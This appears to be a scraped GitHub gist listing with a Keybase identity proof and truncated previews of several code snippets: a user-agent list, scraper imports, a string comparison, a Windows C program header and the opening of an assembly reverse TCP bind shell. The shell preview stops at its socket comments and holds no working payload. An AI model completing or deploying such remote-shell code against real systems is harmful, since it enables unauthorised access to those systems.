I hereby claim:
- I am b3mb4m on github.
- I am b3mb4m (https://keybase.io/b3mb4m) on keybase.
- I have a public key whose fingerprint is 06E9 A232 0351 7EAA 1A3C 4811 2F5A 426D 4CAA ED66
To claim this, I am signing this object:
| import random | |
| class UserAgent(object): | |
| agent = [ | |
| "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", | |
| "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)", | |
| "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)", | |
| "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)", | |
| "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)", | |
| "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", | |
| "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", |
| import requests | |
| from bs4 import BeautifulSoup | |
| try: | |
| from urlparse import urlparse | |
| from urlparse import urljoin | |
| except: | |
| from urllib.parse import urlparse | |
| from urllib.parse import urljoin | |
| import wget | |
| import os |
I hereby claim:
To claim this, I am signing this object:
| veri1 = "qweqweqwe" | |
| veri2 = "qweqweqweqweqwe" | |
| if len(veri1) > len(veri2): | |
| number = len(veri1) | |
| else: | |
| number = len(veri2) |
| #include <windows.h> | |
| #include <stdlib.h> | |
| #include <tchar.h> | |
| #include <stdio.h> | |
| using namespace std; | |
| //Coded By B3mB4m | |
| //Tested ON Windows XP&7 |
| ;http://codinguy.net/2013/05/16/reverse-tcp-bind-shell/ | |
| global _start | |
| section .text | |
| _start: | |
| ; Socket | |
| ; Function prototype: | |
| ; int socket(int domain, int type, int protocol) | |
| ; Purpose: | |
| ; creates an endpoint for communications, returns a | |
| ; descriptor that will be used thoughout the code to |